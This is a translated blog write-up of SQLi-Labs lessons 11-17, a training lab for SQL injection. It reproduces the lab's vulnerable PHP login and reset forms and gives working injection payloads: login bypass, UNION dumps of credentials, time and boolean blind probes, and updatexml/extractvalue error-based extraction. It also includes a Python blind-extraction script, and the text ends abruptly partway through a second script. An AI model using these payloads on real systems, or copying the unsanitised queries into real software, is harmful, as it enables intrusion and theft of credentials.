SQLi-Labs Study Notes (Less 11-20)

Source: Internet  Editor: 程序博客网  Time: 2024/05/17 02:51

SQLi-Labs Study Notes

SQL, per Baidu Baike: Structured Query Language, SQL for short, is fundamentally a programming language for working with databases. For a beginner, a database is simply where data is stored between the client and the server. SQL manages the database through structured queries, relations, object-oriented programming and so on. Programmers have produced many products of this type, such as MySQL, MS SQL, Oracle and PostgreSQL, and today there are programs that let us manage large databases through structured queries.


SQLi-Labs download: https://github.com/Audi-1/sqli-labs


PS: some of what follows is copied from other people's write-ups and some is my own; I have gathered experience from all over and put it together for everyone, and to improve my own skills. If you have questions, please ask in the comments. Thanks.


Less-11 Error-based POST single-quote string injection


First open the page; it shows "Welcome Dhakkan".


② View the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-11- Error Based- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div>
<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>
<div> Password  :    <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname);
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>

Let's see what kind of request this is and which fields it sends; open the browser's network inspector.

It is a POST request carrying the fields uname and passwd. Add a single quote to make it error out.

Copy the part of the error message that MySQL encloses in single quotes and strip the outer pair; what remains is:
test' LIMIT 0,1

That tells us this is single-quote injection. Next, build the POST body:
uname=user' or 1=1 #&passwd=user'

That returns a username and password; logging in with them works. Besides commenting out the rest of the statement we can also close the single quote, but that raises a question, see the figure below:

Nothing is displayed? Let's look at the SQL statement that was executed:
SELECT username, password FROM users WHERE username='user' or '1'='1' and password='user' LIMIT 0,1

AND binds tighter than OR (AND is evaluated first), so `'1'='1' and password='user'` is evaluated first. No row in users has the password `user`, so that side is false and the statement reduces to:
SELECT username, password FROM users WHERE username='user' or false

There is no user named `user` either, so no row comes back.

What to do, then? uname will not work, so try passwd instead, and it does.

The corresponding SQL is:
SELECT username, password FROM users WHERE username='user' and password='user' or '1'='1' LIMIT 0,1

The left side is false, the right side of the OR is true, so the whole condition is true and we are in. As a rule of thumb: in the first login field (usually the username) use a comment; in the second (usually the password) either closing the quote or a comment works.

Next we can use a UNION query to read database contents:

Build the following POST body:
uname=user&passwd=user' union select group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users#

Blind injection works too, but then you need to write a script. One probe:
uname=user&passwd=user' or length(database())=8#




Less-12 Error-based POST double-quote string injection (variant)

First open the page; it shows "Welcome Dhakkan".


② View the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-12- Error Based- Double quotes- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div>
<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>
<div> Password  :    <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"   />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"   />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>

Start by trying a single quote and a double quote; the error tells you whether the value is quoted and whether anything else (here a parenthesis) wraps it.

The `)` wrapping the variable is obvious in the error, so close it and inject. POST body:
uname=abc&passwd=abc") or 1=1#


Less-13 POST single-quote variant double-query injection

First open the page; it shows "Welcome Dhakkan".


② View the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-13- Double Injection- String- with twist</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div>
<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>
<div> Password  :    <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        //echo "<br>";
        //echo 'Your Password:' .$row['password'];
        //echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"   />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"   />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>

Not much different, and already covered: from the error we can tell the value sits in the (' $id ') form, so the closing is `')`. Note that this lesson no longer echoes the username or password (those echo lines are commented out); it shows only the flag image on success or the MySQL error on failure, so data has to be pulled out through error messages, which is what the "double injection" in the title refers to.


Less-14 POST double-quote double-query injection

First open the page; it shows "Welcome Dhakkan".


② View the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-14- Double Injection- Double quotes- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div>
<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>
<div> Password  :    <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        //echo "<br>";
        //echo 'Your Password:' .$row['password'];
        //echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"  />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>

A single quote gives no error but a double quote does. The variable is wrapped in plain double quotes with no parentheses (`username=$uname` after `$uname='"'.$uname.'"'`), so the closing is just `"`. As in Less-13, the page shows only the flag or the MySQL error, so the data has to come out through error messages; the rest goes as before.



Less-15 Boolean-/time-based single-quote POST blind injection

First open the page; it shows "Welcome Dhakkan".


② View the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-15- Blind- Boolian Based- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div>
<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>
<div> Password  :    <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname);
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        echo "<br>";
        //echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        //print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"   />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>

Here neither a single quote nor a double quote produces any error (print_r(mysql_error()) is commented out, and the page shows only the flag or the slap image), so we fall back to a time-delay function. First confirm that it is single-quote blind injection:

OK, confirmed.


Less-16 Boolean-/time-based double-quote POST blind injection

First open the page; it shows "Welcome Dhakkan".

② View the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-16- Blind- Time Based- Double quotes- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome  <font color="#FF0000"> Dhakkan </font><br></div>
<div  align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/></div>
<div> Password  :    <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        echo "<br>";
        //echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        echo "</br>";
        echo "</br>";
        //echo "Try again looser";
        //print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"  />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>

uname=a&passwd=a") or 1=1# logs in, so this is the double-quote-with-parentheses variant. Test with a time delay:
uname=a&passwd=a")  or if(length(database())=7,1,sleep(5)) #
uname=a&passwd=a")  or if(length(database())=8,1,sleep(5)) #

The first request stalls and the second returns at once, so the database name is 8 characters long (`security`). Note that sleep() sits in the WHERE clause and runs once for every row MySQL evaluates, so the stall is 5 seconds multiplied by the number of rows in users; keep the delay short.
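To make the reasoning behind Less-11 and Less-15 concrete, here is an added Python example (not part of the original notes or of sqli-labs) that rebuilds the exact query string the lesson's PHP concatenates and runs it against an in-memory SQLite copy of a users table. The rows, the `database()` stand-in and the `ascii()` shim are constructed for the demo; SQLite has no `#` comment, so the script cuts the statement at `#` the way MySQL's parser would. It shows three things: the AND-over-OR precedence that makes `' or '1'='1` fail in uname but succeed in passwd, the UNION dump from Less-11, and the boolean-blind extraction script Less-15 needs (the notes only show the `length(database())=8` probe). Less-16 differs only in closing with `")` instead of `'`.

```python
import sqlite3

# Constructed sample rows standing in for the lab's users table (not the lab's real data).
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]


def fresh_db():
    """In-memory SQLite stand-in for the lab's MySQL `security` database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    # MySQL built-ins the payloads use; SQLite lacks them, so shim them for the demo.
    conn.create_function("database", 0, lambda: "security")
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    return conn


def build_query(uname, passwd):
    """The exact string the Less-11 / Less-15 PHP builds: raw POST values, no escaping."""
    return ("SELECT username, password FROM users WHERE username='%s' "
            "and password='%s' LIMIT 0,1" % (uname, passwd))


def run_login(uname, passwd):
    """Return the first matching row, or None, like mysql_fetch_array() on that query."""
    sql = build_query(uname, passwd)
    # MySQL treats '#' as a to-end-of-line comment; SQLite has no such comment, so cut there.
    sql = sql.split("#", 1)[0]
    try:
        return fresh_db().execute(sql).fetchone()
    except sqlite3.Error:
        return None  # mysql_query() returns FALSE on a syntax error, so no row either


def demo_precedence():
    """Why `' or '1'='1` fails from uname but succeeds from passwd: AND binds before OR."""
    via_uname = run_login("user' or '1'='1", "user")   # username='user' or ('1'='1' and password='user')
    via_passwd = run_login("user", "user' or '1'='1")  # (username='user' and password='user') or '1'='1'
    return via_uname, via_passwd


def dump_all():
    """Less-11 UNION dump: one row holding every username and every password."""
    return run_login("user", "user' union select group_concat(username), group_concat(password) from users#")


def blind_oracle(cond):
    """Less-15 boolean oracle: the flag image appears only when a row comes back."""
    return run_login("user", "user' or %s#" % cond) is not None


def blind_extract(oracle, expr, max_len=64):
    """Recover the string value of `expr` through true/false answers alone: first its length,
    then each character by binary search over the printable ASCII range (32..126)."""
    lo, hi = 0, max_len
    while lo < hi:                       # smallest n with NOT(length > n) is the length
        mid = (lo + hi) // 2
        if oracle("length(%s)>%d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    length, out = lo, ""
    for pos in range(1, length + 1):
        lo, hi = 32, 127
        while lo < hi:                   # smallest c with NOT(ascii > c) is the character
            mid = (lo + hi) // 2
            if oracle("ascii(substr(%s,%d,1))>%d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    print(demo_precedence())
    print(dump_all())
    print(blind_extract(blind_oracle, "database()"))
    print(blind_extract(blind_oracle, "(select password from users where username='admin')"))
```

Against the real lab, `blind_oracle` becomes a POST to Less-15 that reports whether flag.jpg or slap.jpg came back; for the time-based variant it would instead wrap the condition in `if(cond,1,sleep(n))` and compare response times. Everything else stays the same.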



Less-17 Error-based UPDATE query POST injection

First open the page; it shows "Welcome Dhakkan".


② View the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-17 Update Query- Error based - String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"><font color="#FFFF00"> [PASSWORD RESET] </br></font>  <font color="#FF0000"> Dhakkan </font><br></div>
<div  align="center" style="margin:20px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the contents -->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">User Name      :         <input type="text"  name="uname" value=""/>  </div>
<div> New Password :        <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }

    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']);
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'New Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;

    if($row)
    {
        //echo '<font color= "#0000ff">';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        echo "<br>";

        if (mysql_error())
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            //echo " You password has been successfully updated " ;
            echo "<br>";
            echo "</font>";
        }
        echo '<img src="../images/flag1.jpg"   />';
        //echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font size="4.5" color="#FFFF00">';
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo '<img src="../images/slap1.jpg"   />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>


Let's analyse the code. Roughly: after receiving username and password it first looks up the row for that username, returning username and password, and then overwrites the stored password with the value just received. The catch is that username goes through a custom filter, check_input(): it first checks for an empty value, truncates a non-empty one to its first 15 characters, and then uses get_magic_quotes_gpc() to see whether magic_quotes_gpc is on or off:

With magic_quotes_gpc=on, you do not need addslashes() on data going into the database or stripslashes() on data coming out; the data displays normally. If you addslashes() input that has already been escaped, you must stripslashes() on output to remove the extra backslashes.

With magic_quotes_gpc=off, you must addslashes() the input yourself, but no stripslashes() is needed on output, because addslashes() does not write the backslashes into the database; it only helps MySQL parse the statement.

Finally it uses ctype_digit() to check whether the username is numeric; a non-numeric value is escaped with mysql_real_escape_string() and wrapped in single quotes, a numeric one goes through intval().

Clearly username is hard to inject; the only way in is guessing a weak username such as admin. But password is not filtered at all, so that is where we go to work:
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];

There are several approaches to injecting an UPDATE; let's summarize them together with INSERT and DELETE:

1. Subquery injection

Subquery injection is the double-query (duplicate-key) error technique; for UPDATE, DELETE and INSERT it is usually attached with an OR. Taking this lesson's UPDATE as the example, we can build:

Get the database name:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x7e,0x27,database(),0x27,0x7e)),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23

Get the table names:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,table_name,0x27,0x7e) from information_schema.tables where table_schema='security'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23

Get the column names:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select group_concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23

Get the user data. For some reason this one did not run successfully:
uname=admin&passwd=' or (select 1 from(select count(*),concat((select concat(0x27,id,0x7e,username,0x7e,password,0x27) from users limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) where username='admin'%23

If anyone knows how to fix it, please post the solution in the comments; it may be down to my MySQL version.


2. Via name_const():
name_const(name, value) returns the given value; when used to produce a result-set column, name_const() makes that column take the given name.
Its usefulness is limited, though: it only works on some versions newer than 5.0.12 that are still fairly old; on today's 5.7 forget it. I am on a newer version, and the injection can only reveal the database version; querying anything else returns "Incorrect arguments to NAME_CONST". So no screenshots here, just the payloads:
uname=admin&passwd=1' or (select * from (select(name_const(database(),1)),name_const(database(),1))a) where username='admin'%23
uname=admin&passwd=1' or (select * from (select(name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1)),name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1))a)

In general, for UPDATE, INSERT and DELETE there is a fixed shape: ... or (select * from(select name_const((select ...),1),name_const((select...),1))a) ...

3. Via updatexml(). Payload: updatexml(1,concat(0x7e,(version())),0)

updatexml(xml_target, xpath_expr, new_xml):

the first argument is the target XML;
the second is an XPath expression (see the w3school XPath tutorial);
the third is what the part matched by the XPath expression is replaced with.

XPath tutorial: http://www.w3school.com.cn/xpath/

xml_target and new_xml can be any value; the point is to make the function error out. A string beginning with `~` (0x7e) is not valid XPath, so MySQL raises an XPATH syntax error and echoes the offending expression, with our data inside it, in the message.

Get the database name first:
uname=admin&passwd=' or updatexml(1,concat(0x7e,concat(database()),0x7e),1)#

Get the table names:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

Get the column names:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#


Get the user data. This one failed here as well:
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e),0)#


The same trick in an INSERT, reading users through the derived-table alias b while inserting into users:
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(select b.n from (select concat_ws(char(32,44,32),id,username,password) n from users u where u.id=1)b)),0) or'', 'Nervo');


4. Via extractvalue():

extractvalue(xml, xpath) is another XPath function for XML data, available since MySQL 5.1 (it queries; updatexml() is the modifying counterpart). When injecting, the first argument can be any number. Straight to the payload:
uname=admin&passwd=' or extractvalue(1,concat(0x7e,(select * from(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)a),0x7e))%23
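The error-based payloads above all run into the same practical limit: MySQL copies the offending XPath into the error message but truncates it to 32 characters, so a group_concat() of table names or a whole user row usually arrives cut off, and the value has to be fetched in 31-character slices with mid() (the 32nd character is the `~` marker). The Python below is an added example, not part of the original notes or of sqli-labs: extract_via_errors() pages through the value using any oracle that returns the page body; less17_oracle() is the real one (the URL http://127.0.0.1/sqli-labs/Less-17/ and the username admin are assumptions), and fake_oracle() is an offline stand-in that evaluates the expression in SQLite over a constructed users table and answers with the same `XPATH syntax error: '~...'` text, truncated as MySQL does, so the script can be run without a lab.

```python
import re
import sqlite3
import urllib.parse
import urllib.request

# MySQL echoes the bad XPath back, e.g.  XPATH syntax error: '~security~'
# (values containing a single quote would cut the match short; the lab data has none)
XPATH_ERR = re.compile(r"XPATH syntax error: '~([^']*?)~?'")

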